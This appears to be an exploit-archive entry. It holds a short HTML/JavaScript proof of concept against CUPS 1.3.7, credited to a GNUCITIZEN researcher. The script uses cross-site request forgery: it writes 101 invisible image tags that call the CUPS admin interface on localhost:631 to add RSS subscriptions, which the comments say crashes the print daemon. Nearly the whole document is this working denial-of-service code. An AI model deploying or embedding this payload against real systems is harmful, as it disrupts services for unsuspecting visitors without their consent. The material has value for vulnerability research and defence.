CUPS version 1.3.7 cross site request forgery remote crash exploit that makes use of the add rss subscription functionality.
6e4f00554a897ed6be22f88ed7198949f40913f4b34db7670960d0d1d9a7cf8f
<!-- cat cups_dos_poc.html -->
<script>
// make 101 CSRFed requests to CUPS daemon via 'img' tags
// causes CUPS daemon to crash
// by Adrian 'pagvac' Pastor | GNUCITIZEN.org
for(var i=1;i<=101;++i) {
document.write("<img width=0 height=0 " +
"src=\"http://localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION_NAME=DOS_TEST_" +
i + "&PRINTER_URI=%23ALL%23&EVENT_JOB_CREATED=on&MAX_EVENTS=20\">");
}
</script>